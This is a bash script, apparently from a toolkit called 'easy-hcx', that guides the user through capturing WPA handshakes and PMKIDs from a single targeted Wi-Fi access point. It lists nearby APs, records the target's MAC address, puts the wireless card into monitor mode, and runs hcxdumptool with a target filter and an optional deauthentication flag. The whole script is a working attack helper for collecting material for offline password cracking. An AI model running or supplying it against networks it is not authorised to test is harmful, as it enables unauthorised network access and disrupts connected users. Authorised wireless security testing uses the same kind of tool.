#!/bin/bash

# Arguments from easy-hcx
nic=$1
save=$2
channel=$3
status=$4
deauth=$5

# Text coloring
yellow='\033[1;33m'
nc='\033[0m'

echo
echo -e "${yellow}This captures WPA handshakes and PMKIDs from a single AP${nc}"

echo
echo -e "${yellow}Enter output name - a folder will be created in "$save" and the capture file inside with this name (.pcapng extension assumed): ${nc}"
read file

echo
echo -e "${yellow}Creating $save/$file${nc}"
mkdir -p $save/$file

echo
echo -e "${yellow}Now to get a list of APs. Hit control-c once it scans through all the channels or your target appears then copy the MAC address of the target AP."
read -p $'\e[91m'"Press enter to continue"$'\e[0m'
./assets/ap-list $nic $channel

echo
echo -e "${yellow}Enter the MAC address of the targeted AP - make sure the AP is in range!${nc}"
read mac

echo
echo -e "${yellow}Saving target AP's MAC to $save/$file/$file.filter${nc}"
echo $mac>$save/$file/$file.filter

echo
echo -e "${yellow}Re-enabling monitor mode...${nc}"
ifconfig $nic down
iwconfig $nic mode monitor
ifconfig $nic up

echo
echo -e "${yellow}Now to capture a handshake or PMKID. Press Control-C when you've gotten enough.${nc}"

echo
echo -e "${yellow}Running hcxdumptool -i $nic -o $save/$file/$file.pcapng --enable_status=$status --filtermode=3 --filterlist=$save/$file/$file.filter  $deauth${nc}"
hcxdumptool -i $nic -o $save/$file/$file.pcapng --enable_status=$status --filtermode=3 --filterlist=$save/$file/$file.filter $deauth

read -p $'\e[91m'"Press enter to continue"$'\e[0m'
